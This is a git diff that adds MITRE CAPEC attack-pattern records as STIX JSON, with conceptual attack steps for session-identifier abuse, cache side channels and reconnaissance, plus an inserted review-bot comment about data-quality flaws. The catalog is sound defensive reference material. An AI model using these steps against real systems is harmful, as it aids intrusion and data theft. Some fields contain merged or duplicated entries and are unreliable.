@@ -0,0 +1,141 @@ +{ + "id": "bundle--a4b01938-3676-4511-af64-8c3cb8ceaa9a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary guesses, obtains, or \"rides\" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.\n ", + "external_references": [ + { + "external_id": "CAPEC-21", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/21.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-6", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-642", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/642.html" + }, + { + "description": "Access Token Manipulation", + "external_id": "T1134", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134" + }, + { + "description": "Steal Application Access Token", + "external_id": "T1528", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1528" + }, + { + "description": 
"Steal Web Session Cookie", + "external_id": "T1539", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1539" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Trusted Identifiers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an adversary to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an adversary to exploit session IDs.\n A brute force attack involves an adversary repeatedly attempting to query the system with a spoofed session header in the HTTP request. 
A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an adversary can retry several hundred or thousand request with little to no issue on their side.\n The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The adversary can then use these variables and access the application.\n ", + "For example, in a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or the process that wrote the message to the queue is authentic and authorized to do so." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for Indicators of Susceptibility: Using a variety of methods, until one is found that applies to the target, the adversary probes for cookies, session tokens, or entry points that bypass identifiers altogether.

  2. Techniques
    Spider all available pages
    Attack known bad interfaces
    Search outward-facing configuration and properties files for identifiers.

Experiment

  1. Fetch samples: The adversary fetches many samples of identifiers. This may be through legitimate access (logging in, legitimate connections, etc.) or via systematic probing.

  2. Techniques
    An adversary makes many anonymous connections and records the session IDs assigned.
    An adversary makes authorized connections and records the session tokens or credentials issued.
    An adversary gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connection from it, attempting to gain the same privileges as a trusted system.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks leveraging trusted identifiers typically result in the adversary laterally moving within the local network, since users are often allowed to authenticate to systems/applications within the network using the same identifier. This allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.\n Attacks on trusted identifiers take advantage of the fact that some software accepts user input without verifying its authenticity. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. Similarly, servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Identifiers may be guessed or obtained due to insufficient randomness, poor protection (passed/stored in the clear), lack of integrity (unsigned), or improper correlation with access control policy enforcement points. Exposed configuration and properties files that contain sensitive data may additionally provide an adversary with the information needed to obtain these identifiers. 
An adversary may also \"ride\" an identifier via a malicious link, as is the case in Cross Site Request Forgery (CSRF) attacks.\n Regardless of the attack vector, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d" + ], + "x_capec_prerequisites": [ + "Server software must rely on weak identifier proof and/or verification schemes.", + "Identifiers must have long lifetimes and potential for reusability.", + "Server software must allow concurrent sessions to exist." + ], + "x_capec_resources_required": [ + "Ability to deploy software on network.", + "Ability to communicate synchronously or asynchronously with server." + ], + "x_capec_skills_required": { + "Low": "To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--d4fd1606-6a28-4831-956b-ceab18f3546a.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--d4fd1606-6a28-4831-956b-ceab18f3546a.json new file mode 100644 index 0000000000000000000000000000000000000000..6817fa991d4d90da84c2ebe6d280dda2b20c399c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--d4fd1606-6a28-4831-956b-ceab18f3546a.json 
@@ -0,0 +1,35 @@
+{
+ "id": "bundle--b104b8dc-a0cb-4fda-91a6-7b1a24ddeb57",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-405",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/405.html"
+ },
+ {
+ "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC",
+ "external_id": "REF-348",
+ "source_name": "reference_from_CAPEC",
+ "url": "http://www.social-engineer.org"
+ }
+ ],
+ "id": "attack-pattern--d4fd1606-6a28-4831-956b-ceab18f3546a",
+ "modified": "2018-07-31T00:00:00.000Z",
+ "name": "DEPRECATED: Social Information Gathering via Research",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Meta",
+ "x_capec_status": "Deprecated",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--d946bee3-57a8-4f1b-9c58-1c537519618c.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--d946bee3-57a8-4f1b-9c58-1c537519618c.json
new file mode 100644
index 0000000000000000000000000000000000000000..308bdd3a734dc9a0d6d60e7f3f353455681f52f8
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--d946bee3-57a8-4f1b-9c58-1c537519618c.json
@@ -0,0 +1,29 @@
+{
+ "id": "bundle--36c6ed74-6ecf-4104-8d39-25654d7f301f",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "This attack pattern has been deprecated.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-266",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/266.html"
+ }
+ ],
+ "id": "attack-pattern--d946bee3-57a8-4f1b-9c58-1c537519618c",
+ "modified": "2017-05-01T00:00:00.000Z",
+ "name": "DEPRECATED: Manipulate Canonicalization",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Meta",
+ "x_capec_status": "Deprecated",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64.json
new file mode 100644
index 0000000000000000000000000000000000000000..c8a31ce7fb3ba7d4974d700aecf3eb6f59b923fd
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64.json
@@ -0,0 +1,49 @@
+{
+ "id": "bundle--002619a4-13fa-4bc3-b0e1-cf1b45639455",
+ "objects": [
+ {
+ "created": "2017-01-03T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary injects one or more TCP RST packets to a target after the target has made a HTTP GET request. The goal of this attack is to have the target and/or destination web server terminate the TCP connection.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-596",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/596.html"
+ },
+ {
+ "external_id": "CWE-940",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/940.html"
+ },
+ {
+ "description": "John-Paul Verkamp, Minaxi Gupta, Inferring Mechanics of Web Censorship Around the World, 2012, USENIX",
+ "external_id": "REF-477",
+ "source_name": "reference_from_CAPEC"
+ }
+ ],
+ "id": "attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64",
+ "modified": "2019-04-04T00:00:00.000Z",
+ "name": "TCP RST Injection",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_child_of_refs": [
+ "attack-pattern--e6f6d082-2186-4008-b52f-91f67abdba90"
+ ],
+ "x_capec_domains": [
+ "Communications",
+ "Software"
+ ],
+ "x_capec_prerequisites": [
+ "An On/In Path Device"
+ ],
+ "x_capec_status": "Draft",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304.json
new file mode 100644
index 0000000000000000000000000000000000000000..8fee22e871c424e504b3755fd37c0798714f4b16
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304.json 
@@ -0,0 +1,67 @@
+{
+ "id": "bundle--b56d9381-3749-4333-b1fc-5c00b43d30d7",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary enumerates the MX records for a given via a DNS query. This type of information gathering returns the names of mail servers on the network. Mail servers are often not exposed to the Internet but are located within the DMZ of a network protected by a firewall. A side effect of this configuration is that enumerating the MX records for an organization my reveal the IP address of the firewall or possibly other internal systems. Attackers often resort to MX record enumeration when a DNS Zone Transfer is not possible.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-290",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/290.html"
+ },
+ {
+ "external_id": "CWE-200",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/200.html"
+ },
+ {
+ "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
+ "external_id": "REF-33",
+ "source_name": "reference_from_CAPEC"
+ }
+ ],
+ "id": "attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304",
+ "modified": "2018-07-31T00:00:00.000Z",
+ "name": "Enumerate Mail Exchange (MX) Records",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_child_of_refs": [
+ "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482"
+ ],
+ "x_capec_consequences": {
+ "Access_Control": [
+ "Bypass Protection Mechanism",
+ "Hide Activities"
+ ],
+ "Authorization": [
+ "Bypass Protection Mechanism",
+ "Hide Activities"
+ ],
+ "Confidentiality": [
+ "Other",
+ "Bypass Protection Mechanism",
+ "Hide Activities"
+ ]
+ },
+ "x_capec_domains": [
+ "Software"
+ ],
+ "x_capec_prerequisites": [
+ "The adversary requires access to a DNS server that will return the MX records for a network."
+ ],
+ "x_capec_resources_required": [
+ "A command-line utility or other application capable of sending requests to the DNS server is necessary."
+ ],
+ "x_capec_status": "Stable",
+ "x_capec_typical_severity": "Low",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366.json
new file mode 100644
index 0000000000000000000000000000000000000000..4a85a44fda8a6ed487199bfd59132d58f3fe08e6
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366.json
@@ -0,0 +1,74 @@ +{ + "id": "bundle--a221e613-6ca7-4ffb-81e6-41739cfc3a1d", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Malware is inserted in a server motherboard (e.g., in the flash memory) in order to alter server functionality from that intended. The development environment or hardware/software support activity environment is susceptible to an adversary inserting malicious software into hardware components during development or update.\n ", + "external_references": [ + { + "external_id": "CAPEC-677", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/677.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Melinda Reed, John F. 
Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": " Kaspersky Finds Sophisticated UEFI Malware in the Wild , 2020--10---05, ExtremeTech ", + "external_id": "REF-685", + "source_name": "reference_from_CAPEC", + "url": " https://www.extremetech.com/computing/315860-kaspersky-finds-sophisticated-uefi-malware-in-the-wild" + } + ], + "id": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Server Motherboard Compromise", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Malware is inserted into the Unified Extensible Firmware Interface (UEFI) software that resides on a flash memory chip soldered to a computer’s motherboard. It is the first thing to turn on when a system is booted and is allowed access to almost every part of the operating system. Hence, the malware will have extensive control over operating system functions and persist after system reboots. [REF-685]\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary with access to hardware/software processes and tools within the development or hardware/software support environment can insert malicious software into hardware components during development or update/maintenance." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96.json new file mode 100644 index 0000000000000000000000000000000000000000..9f10c45f78c9464d3b2fb0dfe605c440acafa339 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96.json 
@@ -0,0 +1,70 @@ +{ + "id": "bundle--cf567496-29b6-4dcb-a6ac-676dbf7669b6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.", + "external_references": [ + { + "external_id": "CAPEC-546", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/546.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "description": "Kopo M. Ramokapane, Awais Rashid, Jose M. 
Such, Assured Deletion in the Cloud: Requirements, Challenges and Future Directions, Association for Computing Machinery (ACM), Proceedings of the 2016 ACM on Cloud Computing Security Workshop", + "external_id": "REF-461", + "source_name": "reference_from_CAPEC", + "url": "https://nms.kcl.ac.uk/jose.such/pubs/Assured_deletion.pdf" + } + ], + "id": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Incomplete Data Deletion in a Multi-Tenant Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (A successful attack that probes application memory will compromise the confidentiality of that data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The cloud provider must not assuredly delete part or all of the sensitive data for which they are responsible.The adversary must have the ability to interact with the system." + ], + "x_capec_skills_required": { + "Low": "The adversary requires the ability to traverse directory structure." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681.json new file mode 100644 index 0000000000000000000000000000000000000000..14517638b861f2283a5ffecdcf0f8175960d8496 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681.json 
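Review bot: The only `x_capec_prerequisites` entry in this bundle runs two sentences together with no separator (`...for which they are responsible.The adversary must have the ability to interact with the system.`), which reads as two distinct prerequisites collapsed into one string during conversion; a consumer splitting prerequisites per array element will see one malformed item. The `Confidentiality` consequence text also talks about an attack that "probes application memory", while the description is about storage left behind by former tenants, so the two fields describe different attack surfaces. Both look like artifacts inherited from the upstream CAPEC 3.9 STIX export in this vendored cti-ATT-CK-v13.1 snapshot rather than something introduced by this commit; if the data feeds a training or retrieval corpus, normalise it in a post-processing step (split on `.` followed by an uppercase letter for this field, or carry the two prerequisites as separate array items) rather than hand-editing the vendored file.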
@@ -0,0 +1,133 @@ +{ + "id": "bundle--efd07825-e253-4ded-af0b-5b3916a880e8", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution to expose sensitive data and bypass/subvert access control over restricted resources. Typically, the adversary conducts a covert channel attack to target non-discarded microarchitectural changes caused by transient executions such as speculative execution, branch prediction, instruction pipelining, and/or out-of-order execution. The transient execution results in a series of instructions (gadgets) which construct covert channel and access/transfer the secret data.", + "external_references": [ + { + "external_id": "CAPEC-663", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/663.html" + }, + { + "external_id": "CWE-1037", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1037.html" + }, + { + "external_id": "CWE-1303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1303.html" + }, + { + "external_id": "CWE-1264", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1264.html" + }, + { + "description": "Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, Yuval Yarom, Spectre Attacks: Exploiting Speculative Execution, 2019, Graz University of Technology", + "external_id": "REF-637", + "source_name": "reference_from_CAPEC", + "url": "https://spectreattack.com/spectre.pdf" + }, + { + "description": "Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom, Mike Hamburg, Meltdown: Reading Kernel Memory from User Space, 2018, Graz University of Technology", + 
"external_id": "REF-638", + "source_name": "reference_from_CAPEC", + "url": "https://meltdownattack.com/meltdown.pdf" + }, + { + "description": "Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, Daniel Gruss, A Systematic Evaluation of Transient Execution Attacks and Defenses, 2019--05---15, Graz University of Technology", + "external_id": "REF-639", + "source_name": "reference_from_CAPEC", + "url": "https://arxiv.org/abs/1811.05441" + }, + { + "description": "Qian Ge, Yuval Yarom, Gernot Heiser, A Survey of Microarchitectural Timing Attacks and Countermeasures on Contemporary Hardware, 2016--12---26, Journal of Cryptographic Engineering", + "external_id": "REF-640", + "source_name": "reference_from_CAPEC", + "url": "https://eprint.iacr.org/2016/613.pdf" + }, + { + "description": "Nael Abu-Ghazaleh, Dmitry Ponomarev, Dmitry Evtyushkin, How the Spectre and Meltdown Hacks Really Worked, 2019--02---28, IEEE Spectrum", + "external_id": "REF-641", + "source_name": "reference_from_CAPEC", + "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked" + }, + { + "description": "James Sanders, Spectre and Meltdown explained: A comprehensive guide for professionals, 2019--05---15, TechRepublic", + "external_id": "REF-642", + "source_name": "reference_from_CAPEC", + "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked" + }, + { + "description": "Alert (TA18-004A) Meltdown and Spectre Side-Channel Vulnerability Guidance, 2018--01---04, CISA", + "external_id": "REF-643", + "source_name": "reference_from_CAPEC", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-004A" + } + ], + "id": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Exploitation of Transient Instruction Execution", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb" + ], + "x_capec_child_of_refs": [ + "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_example_instances": [ + "\n A web browser with user-privileges executes JavaScript code imbedded within a malicious website. The system does not disable shared buffers for the web browser and there is no restriction or check upon user-process execution of flush or evict instructions. The Javascript code executes vulnerable transient instructions upon system to cause microarchitectural changes that establish covert channel and transfer sensitive/secret data into shared cache from address space of either kernel, web browser or another executing process on the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application and relevant OS shared code libraries: Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack.

  2. Techniques
    Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system.
  3. Explore cache and identify impacts: Utilize tools to understand the impact of transient instruction execution upon address spaces and CPU operations.

  4. Techniques
    Run OS or application specific tools that examine the contents of cache.

Experiment

  1. Cause conditions for identified transient instruction set execution: Adversary ensures that specific code/instructions of the target process are executed by CPU, so desired transient instructions are executed.

  2. Cause specific secret data to be cached from restricted address space: Executed instruction sets (gadgets) in target address space, initially executed via adversary-chosen transient instructions sets, establish covert channel and transfer secret data across this channel to cache.

  3. Techniques
    Prediction-based - adversary trains CPU to incorrectly predict/speculate conditions for instruction execution to be true, hence executing adversary-chosen transient instructions. These prediction-based methods include: Pattern History Table (PHT)/Input Validation Bypass, Branch Target Buffer (BTB)/Branch Target Injection, Return Stack Buffer (RSB)/Return Address Injection, and Store To Load (STL)/Speculative Store Bypass.
    Exception/Fault-based - adversary has CPU execute transient instructions that raise an exception allowing inaccessible memory space to be accessed via out-of-order execution. These exception/fault-based methods include: Supervisor-only Bypass, Virtual Translation Bypass, System Register Bypass, FPU Register Bypass, Read-only Bypass, Protection Key Bypass, and Bounds Check Bypass.

Exploit

  1. Perform covert channel attack to obtain/access secret data: Adversary process code removes instructions/data from shared cache set, waits for target process to reinsert them back into cache, to identify location of secret data via a timing method. Adversary continuously repeat this process to identify and access entirety of targeted secret data.

  2. Techniques
    Flush+Reload - adversary frequently flushes targeted memory cache line using a dedicated machine flush instruction, and uses another process to measure time taken for CPU to load victim secret data.
    Evict+Time - adversary causes victim to load target set into cache and measures time for victim process to load this data, setting a baseline. Adversary evicts a specified cache line and causes victim process to execute again, and measures any change in execution time, to determine if cache line was accessed.
    Prime+Probe - adversary primes cache by filling cache line(s) or set(s) with data, after some time victim process evicts this adversary data to replace it with secret data. The adversary then probes/accesses all the previously accessed cache lines detecting cache misses, which determine that their attacker data has been evicted and replaced with secret data from victim process.
